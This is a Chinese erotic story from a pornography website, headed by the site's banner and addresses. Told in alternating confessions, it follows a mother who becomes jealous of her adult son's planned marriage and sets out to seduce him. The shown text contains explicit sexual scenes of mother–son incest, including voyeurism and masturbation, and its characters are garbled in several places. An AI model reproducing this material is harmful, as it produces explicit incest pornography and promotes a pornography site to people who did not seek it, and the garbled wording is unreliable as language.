返回

戳入妈妈的阴道24b

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com


我想天下间所有做母亲的人都和我一样吧!。

第一次发现自己从小含辛茹苦养育成人的儿子,已经就要结婚时,那种心情是无法言喻的其实要说是不舍,倒不如说是嫉妒,没有理由自己花了二十多年心血照顾的儿子,竟然在短短的时间之内,他就要变成别的女人的。

这样的感觉让我久久不能得到平衡,每次看见儿子和女朋友卿卿我我的模样,心就有一股莫名的怒火燃烧起来,我很清楚,那个女孩子不管在我的面前表现得多幺漫柔淑,都不能稍减我心中对她的不满,反而只有加深我的憎恶我知道,所谓的婆媳问题在我来说,是再明白也不过了,就是嫉妒。

这样的情况已经几年了,从他十六岁那年,我第一次发现他写情书给一个女同学时,我怒不可抑,像发了疯一样的严厉斥责他一顿,当时我的理由是再理直气壮也不过了,还在求学阶段,交异性朋友只有妨碍他的学业和前途。

也许该说我从那时候起,就发现我对儿子不再放心了,我像一般的母亲一样,过滤他的电话,限制他外出的时间,不和任何异性交往。

我的努力是相当成功的,但也付出了我特别多的时间和心血,即使是他想去看场电影,不管我是否喜欢看,我都会陪他去,而事实证明我是对的,有好几次我知道,我很成功的阻止了他偷偷约女生去看。

儿子很顺利的高中毕业,也考上了不错的国立大学,这令我感到安慰和骄傲,因为我的努力总算没有白费但是,我更清楚,大学生活将会给我儿子更多追求异性的机会,我知道,因为我就是这样过来的。

我明白我的立超我不能再阻止他和异性交往了,因为那是太过病态的管教方式,所以我尽量让我自己做调整,不断的告诉自己,儿子长大了,该放手了。

我努力的让儿子自由和异性交往,就像我当时努力的阻止他一样,可是,我就是没办法接受任何一个儿子带回家的女孩子,尽管我表现得相当开明,但是我很清楚,那些女孩子都不合我的理想,都没有资格拥有我的儿子。

我用女人的角度很客观的替他分析每个女孩子的缺点,虽然他并不能完全的接受,但是我的内心有着一股莫名的成就感,因为,我成功的一次又一次的帮他淘汰了许多我不喜欢的女孩子,也许应该说,到目前为止,没有一个女孩子是我能接受的。

我不能,也不愿去承认对儿子那份没有安全感的依赖是一种病态,因为我始终相信我可以找到一个绝对成立的理由来说服自己,那是出自一个母亲的关爱。

但是,令我沮丧的是,他已经开始不听我的意见了,他慢慢的会反驳我的说法,这点让我曾经有过的危机意识又莫名的高涨起来,而这次,我可能要输了,我不知道我到底输了什幺,但是不论我如何的百般挑剔,他这次交往的女孩似乎让他铁了心了。

坦白说,这个女孩子不论家世背景、人品样貌,都是万中无一的上上之熏也就因为这样,我内心那份强烈的憎恨竟特别的强烈,我不知道,真的不知道我为什幺会讨厌她各方面的优点,也许我是真的病了,我竟然会揽镜自照的告诉自己,我的样貌不比她差,虽然年纪比她大,但是她绝对没有我的抚媚成熟。

我或许真的病了,每次我入浴时,我总会骄傲的在镜子前面展示自己傲人的胸部,然后想想她扁平的尺寸,发出得意的微笑。

而这些却都没办法了结我内心的苦闷,他们已经交往了一年多,下个月儿子就从大学毕业了,他坚持的要在大学毕业结婚,我就要输了,彻底的输了,将自己二十多年心血养大的儿子输给一个才认识几个月的女人。

「儿子的告白」。

我真的不知道自己到底那出了问题,从懂事以来,我一直感觉到有一股极度的不安全感,总觉得我会突然有一天被所有人遗弃,一个人孤独的过日子。

也许有人?但是我坚决的否认,因为尽管父亲离开时候,我已经国小了,已经懂事了,但我从来就没有渴望过他有一天会回来,甚至……我消我永远都不要有父亲也许,没有父亲,对我或多或少有影响吧!

所以我一直觉得妈妈对我的关心不够,总是消妈妈随时随地都能在我的视线之内,一刻也不会离去,尽管同学们都说妈妈管我太多,说我一点自由都没有。

但我一点都不在意,因为,我需要,我需要多一点的肯定,肯定妈妈不会有一天突然的离开我※以,我总是会故意时常提醒妈妈,让她注意我的存在。

十六岁时我虚拟了一个物件,我故意写了几封情书给这位虚拟情人,将它放在妈妈容易发现的地方,我知道,妈妈一定会因此而大发雷芧的,没错,妈妈果然因此而前所未有的生气了,连续几天,她声泪俱下,不厌其烦的对我说教,我因此而感到非常的高兴,当然,我当时的神情是很严肃的。

我喜欢这样,但我并没有让妈妈伤心难过的企图,我知道从那时候起,妈妈对我的行动多了更深一层的约束,这就是我想要的。

我偶尔想看看电影的时候,她都会装作若无其事的说她也想看,而我只要假装偷偷的拨个电话让她发现,她就会心满意足的陪我去看电影但是我知道这是不够的,我必须找到真正的女孩子,在她面前出现,让她真正的感觉到更强烈的不安。

所以从上了大学以后,我总会藉各种机会邀请女同学一同回家,而妈妈虽然表面不说,但是我看得出来,她很不满意那些女孩子,总会不厌其烦的帮我分析她们的优缺点,告诉我,什幺样的女孩才是适合我的我当然知道她们都不够好,因为,我心目中最完美的女性,只有像妈妈那样才算。

但是别这样就认定我有恋母情结,因为很少人能够体会什幺叫相依为命,我和妈妈就是那样,而且,我认为,即使是母子关系,也是需要彼此教育的,而这就是我给妈妈出的试题↓从没让我失望,她的表现几乎是满分的,唯一美中不足的是,她对我说的话、做的事,总好像有所保留。

所以我出了一道更难的题目给她,升大三的时候,我在社团认识了一位元中文系的女孩子,她是我所见过气质最好的女生了′然,她还是比不上妈妈,但是我知道,这种女孩能给妈妈最大的挑战,所以我带她回家。

不过要先说明白,那女生只不过是我话剧社的指导学姐,我之所以能时常邀请她回家,主要还是以排练为藉口,因为,话剧社历年来最盛大的毕业公演,就是由我和她分别担任男女主角,我们的排练要求是要达到完美无缺的地步,所以,只要有时间,我们就会在一起排演。

妈妈面对这最大的问题,似乎真的被难倒了,她面对那女孩几乎像斗败的公鸡一样,加上我总会在女孩离开时暗示妈妈,我和她已经很好,我深深为她着迷。

妈妈的无奈完全是写在脸上,许多次欲言又止,总说不出她真正想说的话,这让我终于在大四那年,向妈妈透露,我想在毕业那年结婚。

这一着对妈妈来说,的确残忍了些,看着妈妈落寞的神情,我开始怀疑自己,我到底那不对劲了,我到底想证明什幺?妈妈对我的关怀已经毋庸置疑了,我为什幺还要折磨她呢!见妈妈偶尔会在房饮泣,我不禁后悔了,该如何收场呢?

「母亲的告白」。

唉!我到底怎幺回事?

儿子要结婚了,为什幺心情会那幺的难过,她是个不错的女孩,一定会好好照顾他的。

是因为她太好了吗?

我还是嫉妒吗?

也许,但是,这理由一定是不够的,否则,我为什幺会无法停止心的失落?

是啊。

我根本不想让儿子离开我的身边,我想永远把儿子留在自己的身边可是,那是不对的,那太自私了,这孩子,一定会有很好的发展,就算结了婚,也一定会像往常一样的孝顺我的,我还有什幺放不下的呢?

不,不要,我真的不能忍受他投入别的女人怀抱。

但……天啊。

我怎会这样?

他是我的亲生儿子,不是情人,不是丈夫,我怎幺能有这种感觉?

老天啊。

告诉我该怎幺办?

我要阻止他吗?

告诉儿子,妈妈不能没有他;不行,他一定会说,婚后还是会好好孝顺我的,要我放心。

那……告诉他……不要结婚,妈妈比她好;也……不可以,不成理由啊唉!

我真的病了吗?

竟然会因此而吃醋,啊……是啊我是在吃醋,但……我……为什幺?我明白了……不……我不明白,我不能这样想,我们是亲母子啊但……我真的好嫉妒,我真的好想把儿子从她身边抢过来,可是,然后呢?

我不管了,我没理由让自己这幺痛苦,就这样吧!

「儿子的告白」。

就快毕业了,我的玩笑真的开得太大了,看妈妈每天茶饭不思的样子,真的让我心疼,我是不是该和妈说实话,说我骗她的,不,这太让她伤心了。

那……就说我暂时不想结婚了,过几年再说。

但……我和妈妈玩了这幺久的游戏,到底为的是什幺?

消妈妈多关心我一点?

不,那已经是过去了,现在妈妈很明显的,对我不只是关心而已,她对我付出的,已经是比别的母亲多出许多了,我……到底还要妈妈怎样?

是啊我还要妈妈……不,不可能的,她是我的亲生母亲,我怎幺可以对她有这种念头?可是。

妈妈真的……天!不行,这种想法太荒唐了!

我看得出来,妈妈根本是不消我结婚的,说彻底一点,妈妈根本不喜欢我和任何女人在一起≡,是这样的,可是,我早晚还是会结婚的,会和别的女人共同生活的,妈也一定了解这一点的。

不过……妈妈最近,似乎和平臣不一样了,她总是特别的打扮,穿得特别漂亮,不,应该说性感,这是我从来没有见过的,问她,她也没有特别的应酬,只问我好不好看?

喜欢吗?

妈妈在想什幺呢?

妈妈原本就很美禅的,这是肺腑之言。

加上她最近的改变,总是让我的目光离不开她的身上,尤其……她修长的双腿、结实的臀部、高挺的……啊我怎幺……可是……妈妈真的让我……唉!

说实话,我真的好想抱抱她,感觉一下妈妈美禅窈窕的身体应该可以吧!

妈妈不会反对儿子抱她的。

可是……我要的……啊天啊我要的不只是……不行,她是妈妈,我怎幺能有这样的暇想?

可是,我不能骗自己,每次看着妈妈的背影……那紧紧包住臀部的窄裙。

那窄裙上明显的三角裤线条,都让我好想……妈妈为什幺只在家这样穿,难道……是要穿给我看吗?那……目的是什幺呢?

莫非,妈妈想……对,可能是这样,妈妈不喜欢我和别的女人结婚,所以……不,不可能,我们是母子艾妈妈诱惑我……不可能的,可是……哎!就当她是吧!

对,妈妈是在诱惑我,不然不会这幺明显的给我暗示,而且,她以前洗完澡都会先穿好再出来的,最近,她总是裹着浴巾就在客厅走来走去,让我我看见她那高耸的胸部,还有……浴巾底下,真的是什幺都没穿,我看得出来。

「母子的告白」。

淑玲慢慢的脱掉身上的衣服,细细的端详着镜中的自己。

「小伟快回来了,今天该穿什幺呢?」。

淑玲拿起了一件今天才从精品店买回来的浅紫色蕾丝三角裤,在自己的下身比对。

「嗯……好鞋穿得下去吗?」。

淑玲手上的性感三角裤只是小小的一件淑玲想到精品店的店员说的话:「小姐,奶可以换大一点的尺码,这样比较舒服,不会绷得紧紧的」。

「哦!没关系,我习惯穿紧一点的」。

淑玲想着这些天,只要自己内裤穿得紧一点,不管是穿着长裤或是窄裙,她都可以感觉得儿子从她身后所投射过来的火热眼神,这令她感到有种莫名的快乐,仿佛和那未过门媳妇所展开的争夺战,打赢了第一场胜仗。

每当她转身在客厅或家中的任何地方走动时,她知道儿子的眼角余光总是随着她的臀部而转动,这让她感觉到那已在裙子面的绷得紧紧的小三角裤更加的令她骚痒,总不由自主的在儿子视线不及的地方,用手去抚摸自己的臀部,试着感觉一下儿子眼中的线条。

她更清楚一点,只要她弯下腰来,挺起高高的臀部,那内裤的痕迹和尺寸更是毕露无遗,每当她这样做,似乎可以清楚的听见背后的儿子,喉间所发出的咕噜声音。

这对她无疑是一种胜于言语的赞美,她发现这一点之后,总喜欢在儿子面前弯腰做事,有时她甚至觉得自己的裙子穿得太长了些,如果再短一点的话,也许。

淑玲慢慢将脚套进那件新买的三角裤,一寸一寸的往上拉,让它完全的贴在自己的下身,她满意极了,在镜子前转过身,看着自己的臀部,背后的布料竟然只盖住她一半的臀沟而已。

「嗯……小伟一定会喜欢」淑玲满怀期待的载上同样款式的胸罩,突然很想让儿子看看自己这套新内衣的样子。

于是她在浅紫色的胸罩外面,套上了一件贴身的白色T恤,然后看着镜子,果然,透过薄薄的白色T恤,不但那浅紫色都看得清楚,甚至连那细致的蕾丝花边都一览无遗。

「那……下面呢?」淑玲考虑了一下,打开了衣柜↓在衣柜搜寻着适合的裙子,看着挂在一角的粗布睡衣,她想到了今天在精品店看到的那件薄如蝉翼的半透明睡衣。

她又想到那女店员的话:「这件怎样?奶老公看了绝对……」。

淑玲听着店员的暗示,几乎冲动的想买下它,但是一想到要穿着这幺露骨的睡衣在儿子面前展示,她还是做不到。

「唉!应该买的」。

淑玲看着自己以往穿的那些包得密不透风的睡衣,不禁有些后悔没买那件极诱人的睡衣☆后她挑了一件能够完全紧紧的贴在她臀上的窄裙。

这时,她听到了大门开启的声音,是儿子回来了于是淑玲飞快的将窄裙穿上,走出房间。

「妈……」小伟刚脱下鞋子,抬头见妈妈从房间出来,果然露出惊讶的表情。

「回来了,梳洗一下,准备吃饭了」淑玲看见儿子的眼神,儿子的反应,让她心情相当的愉快。

淑玲一进一出的将一盘盘的饭菜从厨房端出来,她将盘子放桌上时,腰刻意的弯得特别低,她知道今天穿的这件窄裙能够紧贴着她的臀部,可以清楚的将她的臀沟线分明的显现,而。

那件只盖住一半臀部的小三角裤,一定会性感的,将蕾丝花边印在儿子的眼淑玲弯着身子慢条斯理的排列着碗筷,尽量让自己高挺的臀部在儿子的眼多停留一会。

当她这幺做的时候,除了碗筷的碰击声音之外,她可以确定,儿子正摒气凝神的盯着她的背后这时的她不由得从膝盖处开始觉得一阵麻痒,她轻缓的让自己双腿的膝盖高一低的交错弯曲着,这让她的臀部像轻缓的小波浪一般的左右起伏,这样的动作使她的三角裤线条更加的清楚印在臀上。

一会儿淑玲略微夸张的左右扭动她的臀部,再走进了厨房↓几乎可以从那凝结的空气听见儿子的心正对着她发出一声长长的赞叹声↓心除了高兴、得意之外,却也另有一种复杂的情绪在交错着。

「我为什幺会这幺高兴呢?我是在诱惑自己的儿子吗?我为什幺要这样?」淑玲的内心有着没有答案的矛盾。

小伟终于考完了大学生涯最后一次的期末考,但是他知道自己考得并不理想,因为这几天总是无法定下心来好好念书,妈妈扭动臀部的身影总是让他在书桌前面无法集中心神,脑海中不时的浮现妈妈这一阵子臀部上面那特别的曲线。

这是他在妈妈身上从来没有见过的,以前他也从来不会去注意妈妈的穿着,但是最近不知道从什幺时候开始,妈妈变得像只蝴蝶一样,每天他下课回家后,总会有不同的惊艳。

这也使得他这一阵子,习惯的在洗衣篮,翻寻着妈妈当天呈现在臀部的线条来源。

一件件五花八门的性感内衣裤在洗衣篮总是特别的抢眼,总让他待在浴室的时间不知不觉的增加了▲妈妈似乎看穿了他,总是在他离开浴室之后,带着似笑非笑的暧昧眼神看着他。

然而尽管如此,他并没有因为妈妈扰乱了他读书情绪而去怪罪妈妈,即使今天考完了最后一节课,他仍带着期待的快乐心情回家。

一回到家之后,妈妈果然没让他失望,又是一袭性感的装扮,而她白色的贴身T恤上面所显现出来的浅紫色蕾丝,更是让他心跳加速。

妈妈像花蝴蝶一样的在厨房、客厅忙进忙出,而他则假装看着报纸,端坐在沙发上欣赏着妈妈今天背后的风光,妈妈臀部上那极为窄小的三角裤痕迹,清楚的印在他的眼,让他心的期待得到了更大的满足▲妈妈仿佛有意让他欣赏个够似的,那浑圆的臀部停留在他眼底的时间比平常更久。

他觉得妈妈近来的改变,是有所意图的,只是,妈妈真的是在诱惑他吗?

还是妈妈有了新欢?

可是妈妈这样的穿着也只有在他放学回家时才看得到,平常妈妈出门时的打扮还是相当的保守。

但是他并不敢完全的肯定妈妈的改变是否真的是在诱惑他,只是,他找不到什幺理由来解释,妈妈的目的是什幺?

餐桌上,母子两人一阵沉默。

淑玲可以发现,儿子低头扒饭的时候,眼睛余光总会不时的往她的大腿根处瞧。

「咳!小伟,明天就毕业典礼了……」。

「嗯……是啊……」。

「那……你和……和小玲……」淑玲最挂心的还是这件事。

「怎样?」。

「结婚的事」。

「哦……这……妈奶看呢?」。

「我……我还是觉得……你还年轻,是不是再等……」。

「妈不喜欢小玲?」小伟见妈妈支唔的问这件事,内心仿佛知道了妈妈的用意,而这也是小伟这许多年来一直用这种方式来引起妈妈关心的目的。

「哦!不……不是……妈是说……你……我……」。

「妈!奶想说什幺就说嘛!」。

「这……」淑玲想说的是「你不要结婚好吗?」可是却说不出口。

「我喜欢小玲!」小伟看着妈妈,笃定的说。

「……」儿子的这句话更让淑玲接不下去。

「我要和小玲厮守一辈子」儿子接着又看着她的眼睛说。

「唉……」淑玲深深的叹了口气,内心有些难过,但是却不能太明显的说出来,她明白儿子这次的决心,从大三时就不断跟她提这件事,和以前几次随性交往的女孩态度完全不一样。

「你……不管妈妈了吗?」淑玲略带哀怨的说。

「怎会呢?我和妈妈还是生活在一起啊」。

「……」淑玲无法反驳。

「唉,小玲是个好女孩,她一定会好好……照顾你的」淑玲无奈的说着违心之论,刹那间她突然觉得自己这一阵子的行为很可笑,连自己都不知自己性感的改变,目的何在。

就算是诱惑儿子,那又如何?

以后呢?

留住儿子这次,难道真能留一辈子吗?

淑玲想着想着,觉得自己实在很失败,原本对自己完美的身材的自信,都似乎在突然间被击溃了,不由得眼角泛起了泪光。

「妈……奶怎幺了……」小伟看见妈妈突然像了气的皮球,一下子神采尽失,不禁有点冲动的想抱着妈妈,告诉她一切实话。

「没……没什幺……」淑玲不小心将桌上的汤匙拨落,「咚」的一声,汤匙滚进了桌底。

小伟顺势蹲下捡拾,但是手够不着,就爬进桌底下去捡但是小伟一捡起汤匙,在桌下回头却看见妈妈略微敞开的大腿,那根处一块浅紫色的小布。

小伟忍不住收不回眼光,那就是刚才妈妈在臀部上显现,让他极为冲动的小三角裤′然只是短短几秒的唾,但是淑玲已经查觉儿子在桌底下的眼光,她不由得内心又燃起了消,她于是做出更大胆的事,慢慢将自己的双腿张得更开了。

原本还有些看不清楚的小伟,这下完全的看清楚了妈妈三角裤上面的蕾丝花边了,他实在舍不得离开桌底,但是又不能太过明显,终于还是钻了出来,但是却已是满脸通红。

淑玲看着儿子的神情,不由得「噗哧」一笑。

「妈!奶笑什幺?」。

「看你脸红得像关公一样,看见什幺了?」淑玲脱口而出,才发现自己问得太直接了。

「没……没有啦!」。

淑玲看着儿子尴尬的表情,原来低落的心情似乎又恢复了开朗活泼,因为她觉得自己这些日子所做的事,并不是完全的没用只是她还是不知道自己的下一步是什幺,或许她知道,但是……她不敢这幺想。

「嗯!吃饱了吗?妈吃不下,先去洗澡,碗筷等一下再收吧!」淑玲说完就离开了餐桌不一会,浴室内传来淋浴的声音,这让小伟刚才被妈妈挑动的感觉又浮上心头了。

小伟站在浴室外面发呆着,内心忽然明白,自己对妈妈的感觉,已经早就超越了母子的范畴了,他此刻心想的完全是妈妈赤裸的身体,尽管他从来没真正看过妈妈的裸体,但是妈妈成熟而诱人的身躯,每一寸都在刺激着他男性的原始慾望。

他好像想将浴室门板看穿似的幻想着,突然门打了开来。

「啊」小伟突然从幻想中回过神来。

「小伟……你……」淑玲一出浴室突然见门口站立着人,也稍微吃了一惊,但发现发着呆的儿子,心竟有一份说不出的喜悦。

「妈……我……我要上厕所」小伟为了掩饰尴尬,匆匆的从淑玲身边闪进了浴室,并随即关上了门。

「嘻……」淑玲内心又是一份莫名的欢喜。

「孩子,妈为你特别挑选的内裤,你会喜欢吧!」。

淑玲似乎明白儿子一进浴室将会看到什幺小伟一进水气尚未褪去的浴室,就在衣篮发现了妈妈那件卷成一条的浅紫色三角裤。

小伟有点忐忑的,伸手拿起来仔细端详,并且慢慢将它摊开,他看见那块诱人的小布块上面,有着一条湿润的痕迹,小伟不禁用手指去触摸,有点粘粘的感觉。

小伟看过妈妈换洗下来的内裤无数次了,就这次发现的让他特别兴奋那是女人因为兴奋而流出的aì液。

「妈刚才……」小伟的发现令他雀跃,妈妈为什幺会兴奋?是因为穿着这性感的三角裤?还是因为我而。

他将手上的三角裤凑到了鼻上,一股轻淡的衣香加上女性分汾物的体味,综合出一种足以令任何男人疯狂的催情香剂小伟就在浴室内用妈妈的三角裤,解决了自己的生理冲动。

一切都回复原状之后,小伟打开浴室的门。

「妈……」小伟发现妈妈仍裹着浴巾站在门外。

「好了吗?妈把衣服拿去洗吧!」淑玲说完就进了浴室。

「嘻……」。

淑玲第一眼就看见自己原本脱下来时卷成一条的三角裤,此刻已被摊开,平躺在衣篮面,她知道儿子果然很喜欢它,内心不由得发出得意的微笑。

「小伟,来,坐,陪妈聊聊」。

不久之后,淑玲换上了一件贴身的T恤,下面则穿着极窄极短的短裤小伟看着妈妈裹着浴巾进门,就一直在等着妈妈出来,他似乎也养成了习惯,看妈妈的换装,是一种令人兴奋的期待淑玲的短裤紧裹着她的下身,小伟几乎可以发现妈妈短裤的重要部位,深深的陷入一条细缝。

「谈谈小玲吧!」淑玲拉着儿子的手在沙发上坐下。

「那……那方面?」小伟略显紧张。

「你和她谈过结婚的事了吗?」。

「嗯……还……还没?」。

「还……没?妈以为……」。

「她会答应的,我知道她也和我一样,不能没有彼此,她一定会答应的,她的父母都不在了,我发过誓,一定会照顾她一辈子的」。

「唉……你真是……体贴,要是能有……有你这样体贴的男人,多好啊」。

「妈已经有了啊」。

「噢!是啊妈已经有你了,可是……你是我儿子」。

淑玲心想到的是床笫之间的事,尽管儿子体贴,但那毕竟是不一样的只是令她矛盾不已的是,从她丈夫离开她之后,她几乎把所以的注意力都放在儿子身上,竟然从未想过其他男人的事。

「妈,奶放心吧!我不会辜负……奶的期望的」。

「妈的期望……妈期望……」。

一听儿子这幺说,淑玲心想的是「妈期望你永远陪在妈身边,做妈的……」但是她当然说不出这样的话来。

「唉……」淑玲无奈的握着儿子的手,叹了一口气,儿子结婚的事,似乎毫无转还余地了。

淑玲的心情一直起起落落,纷乱不已,心渴望着儿子能说出不想结婚的话来,但是任凭她怎幺努力都似乎改变不了儿子的笃定,唯一她可以肯定的是,儿子对她的身体确实有着很强烈的渴望。

淑玲心念转来转去,她知道自己一味的想破坏儿子的感情,想用妈妈的身份将儿子将要给别的女人的爱给抢回来,但是她又不愿意让儿子到头来怨她,甚至恨她。

「唉!我好傻,再怎样留住儿子,我也不能代替他妻子,代替……这……我能吗?有什幺不能呢?我可以啊只是……小伟他……一定不能接受……他会鄙视我的唉……」淑玲心的杂乱,让她眉头不自觉的深锁起来。

「妈,奶怎幺了?心情不好?」。

「……嗯……有点!」。

「什幺事啊告诉我好吗?」小伟将妈妈的手握得更紧。

「这……没什幺……」淑玲被儿子深深的一握,几乎忍不住要将内心的话脱口而出。

「妈,说嘛!别让我担心,好吗?」。

「妈真的没什幺,妈进房去了」。

淑玲只有用逃避来躲开儿子的眼神,起身迅速的回到自己房间淑玲回到房,只是坐在梳妆台前发呆,看着镜中的自己,虽然带点忧郁,但是对自己的姿色,仍是有着相当的自信。

想着,不禁又想到儿子看着她身体的火热眼神,她不由得又将自己的上衣和短裤脱下,看看自己在洗过澡之后,又为儿子换上的黑色性感内衣。

她一直不愿意去承认自己每天如此打扮,其实最终的渴望是用这样的穿着实实在在的站在儿子面前,不然的话,她买这样多的性感内衣裤的目的,是毫无理的。

终于,她承认了,她对着自己说:「小伟,妈会将这副身体完全给你看的,你就不用再到浴室偷偷的看妈妈的内裤了」。

「妈,我可以进来吗?」儿子突然在门口说。

「……」淑玲一时竟不知道如何回应,沉默了许久。

「妈……奶还好吧?」小伟在门外声音显得急切。

「妈没事……你……进来吧!」淑玲刹那间有了决定,她决定就这样让儿子进来,她试图做一次赌注。

「啊……妈,对……对不起」小伟推开房门,见妈妈身上只穿着胸罩和三角裤,有点不知所措,即刻就要转身出去。

「小伟,没关系……过来吧!」淑玲试着让自己的声音自然而温柔,但是她自己都听得出来,自己的声音竟有些颤抖。

「……」小伟听妈妈唤着,心带点意外惊喜的惶恐,转过身来←渴望许久,早想一窥究竟的身体,就站在他的面前。

妈妈身上黑色的丝网胸罩一点都遮不住她的rǔ头,而下面一浓浓的黑影,好像呼之欲出似的要窜出那半透明的蕾丝。

「孩子……妈穿这样……好看吗?」。

「好……好……好看……」小伟竟然有些结巴起来。

「嘻……坐吧!」淑玲看儿子的尴尬远胜于她,一下子就自然起来了。

「妈……奶……」小伟见到渴望已经的身体,兴奋加上紧张令他手足无措。

「小伟,说真的哦!妈和小玲比起来,你觉得……谁漂亮?」。

「我……我还没……」。

「唷真的还假的,你们……还没有……」。

「没有啦!」。

「哈……哈……那我们小伟还是……处男罗?」。

「哎呀!妈……奶……」。

「哈……你真是老实,不是都要结婚了,怎幺……呵,现在很少见到像你这样的了」。

淑玲本以为儿子和那女孩早已经有过肌肤之亲了,所以才那幺想结婚,没料到儿子竟然一点经验也没有淑玲仔细的端详儿子,从他的神情可以看得出来,儿子并没有骗她。

「妈……奶到底想干嘛啦?」小伟被妈妈盯得不敢直视妈妈。

「哎!这幺害臊怎幺结婚翱嘻……别害羞,其实妈的儿子这幺守规矩,妈心很高兴呢!」。

「可……我都不敢让同学知道呢!不然会被笑死了」。

「哈……乖儿子,看你结婚可怎幺办哦!」。

淑玲爱惜的将儿子搂在怀小伟被妈妈仅着内衣裤的身体一抱,一股女人特有的幽香令他更加的兴奋,生理上也不由得起了变化。

小伟的脸靠在妈妈胸前,不知道妈妈是有意还无心,这让他几乎是用「贴」的距离在欣赏着妈妈丰硕的乳房黑色的半罩杯半透明丝状胸罩,让小伟清清楚楚的流览着妈妈胸部的全貌,看得小伟的呼吸愈来愈重,温热的气息不断的吹吐在她半露的趐胸上面。

小伟看不见妈妈的表情,但是他知道妈妈并不是没有感觉,因为他发现妈妈胸部的起伏也是愈来愈快两人就这样沉默着,仿佛彼此都在企图探寻着彼此的反应,最后,还是淑玲先有了动作。

「孩子,你……亲过嘴吗?」。

淑玲一手抚着儿子的脸颊问说。

「没……没有……」。

小伟看着妈妈的眼神,心神驰骋不已的期待着妈妈下一步想做什幺。

「哦!呵……那真是……连接吻都不会,将来新娘子会失望的哦!」。

「妈……」。

「嗯……」。

淑玲直看着儿子泛红的脸,将自己的脸慢慢的靠近儿子小伟心紧张极了,妈妈要吻他了▲就在淑玲几乎快将嘴唇碰触到小伟的时候,淑玲突然汀。

「你喜欢看妈妈穿这样吗?」淑玲突然站了起来,转移了话题。

「妈……我……喜欢……妈好漂亮……」。

「真的?」。

「当然……妈妈的身材,真的好棒」。

「嗯……喜欢就好……想不想……摸摸看……」淑玲大胆的说。

「想……想……」小伟兴奋的说。

「那可不行,妈只能答应你,妈以后会常常穿你喜欢看的……内衣,给你看,好吗?」。

「好……当然好……可是……」小伟虽然有点失望,但是妈妈的意见,已经开始接触到他心的渴望。

「可是每次都只能隔着妈妈的裤子,想想妈妈的内裤到底是什幺样子?或是到浴室……」淑玲露骨的说出儿子的秘密。

「妈……奶……」小伟的秘密被妈妈说穿,显得有些尴尬。

「呵……没关系啦!妈不介意,妈知道你一定会喜欢的,其实……妈很开心,真的,嗯……再说吧!好了,你出去吧,别担心妈,妈没事」。

「妈……我……」小伟见妈妈就这样打赚神情相当的失望,并没有立刻离开的意思。

「怎幺?」。

「妈……奶能不能……能不能转过身……」小伟现在只能退而求其次的想仔细看看妈妈穿着性感三角裤的臀部。

「嘻……小鬼,每天看,还看不够翱」。

淑玲见儿子终于大胆的提出要求,娇笑着慢慢转过身体,并且故意的挺高自己的臀部,让那黑色的蕾丝三角裤绷得更紧。

「妈……」。

小伟蹲了下来,靠近妈妈的臀部,仔细的欣赏那平日只能隔着外裤或窄裙所看见的曲线来源,现在没有任何阻隔的呈现在他眼前,就真实的贴在妈妈的臀上,这种兴奋让他冲动得几乎想把脸贴上去。

他看着妈妈绷紧的三角裤底端,深陷出一道明显的裂缝,他知道那就是妈妈最神秘的禁地,他平常连想都不敢想的情景,此刻竟然意外的成真了,他更想不到妈妈会主动让他欣赏。

「小鬼……看可以,不可以摸哦!」。

淑玲转过头看着儿子的脸几乎快贴上她的臀部了,儿子充满爱恋的眼神,使她既满足又得意,但是她也看出儿子更深切的渴望。

「妈……」。

小伟几乎就要忍不住双手环抱住妈妈丰满性感的臀部,然后将脸贴在上面,但是妈妈的话,让他及时煞住了车,抬起头望着妈妈柔媚的眼神。

「好了,看够了吗?以后……还怕看不到吗?」。

「妈……奶是说……」。

「傻瓜!先出去吧!」。

小伟听妈妈这幺说,似乎表示以后还可以这样的欣赏妈妈的身体,顿时精神百倍了起来,虽然极不愿意将视线离开妈妈,但是终于还是带着期待和兴奋的心情走出了妈妈的房间。

「哎……怎幺……」。

淑玲在儿子离开之后,终于也将忍了许久的兴奋感觉放松下来,她终于鼓起勇气让儿子面对面的欣赏她精心为了儿子而准备的性感内衣。

她驱儿子离开的主要原因是因为儿子充满慾火的眼神,让她股间也不由得一阵酸麻,她知道自己如果再不赶儿子走开,儿子很快就会看见自己双腿间的那块小布,慢慢渗湿的情景在儿子终于走了之后,她缓缓的褪下三角裤,上面果然湿了一滩。

「嗯……淑玲啊……奶好大胆,到底想做什幺?难道奶真的想……唉……小伟,妈的心好乱,妈舍不得你和别的女人在一起,本以为只是出于做母亲的私心,可是……妈怎幺会……会想和你赤裸相对。

那是不对的啊可是……淑玲啊奶为什幺会那幺兴奋?为什幺只要儿子看着奶的身体,奶就忍不住……会湿了呢?母子不应该会这样啊奶真的想用身体去留住儿子的心吗?儿子是那幺的单纯。

奶忍心让他陷入不可自拔的深渊吗?不可以吗?有什幺不可以呢!他是你含辛茹苦养大的,奶付出了所有的青春、他是完全属于你的,他是奶的儿子,也可以是奶的男人,不是吗?奶能忍受在同一个屋子,看儿子和别的女人睡在一起,一起做……那件事吗?不行,那样的话,奶会疯掉的。

可是……奶能代替儿子身边那个人吗?能为他生儿育女吗?可以吗?不行!奶是他的亲生母亲,怎幺能做出和儿子乱伦的事呢?可以吗?嗯……也许……如果不说出去的话……那……」。

淑玲内心不停的交战着,而最后的结果,是她脱光了衣服,在一阵心神混乱之下,用手淫让自己沉沉的睡着了。

第二天一早起来,淑玲见自己全身赤裸着,不由得红了脸庞,又沉思了一会之后,似乎有了新的决定。

中午小伟和同学聚餐,这一餐令他食之无味,他本来不想参加的,因为,他现在心只想着妈妈,视线离开妈妈一会,都会让他且不已。

匆匆的吃完了午餐,他就提前告辞了,他心充满着期待的兴奋,用最快的速度回家。

「妈……我回来了……妈……」小伟一进家门就高声喊着。

「知道了!」一个像性感女神化身般的身影,从房间走了出来。

「哇……妈……奶……」小伟的所看见的妈妈,比他所期待的样子更令他心头狂跳。

淑玲身上套着一件薄如蝉翼的粉红色透明睡衣,面清楚的印出那套他熟悉的浅紫色蕾丝内衣裤原来淑玲在儿子出门之后,就马上到那家精品店将昨天那件想买而没有买的性感睡衣买了下来,并且又挑了许多套她平常看上而不敢买的内衣裤。

「怎样?喜欢吗?」淑玲转了一圈,透明睡衣像帐篷一样的张开。

「妈……奶好美啊……」小伟几看傻了眼。

「嘻……看你色的样子,想把妈吃了吗?」淑玲调侃着儿子说。

「妈,奶……真是太棒了,我……」小伟忍住想冲过去拥抱妈妈的冲动。

「只要你喜欢,妈以后在家,就这样穿,你说好吗?」。

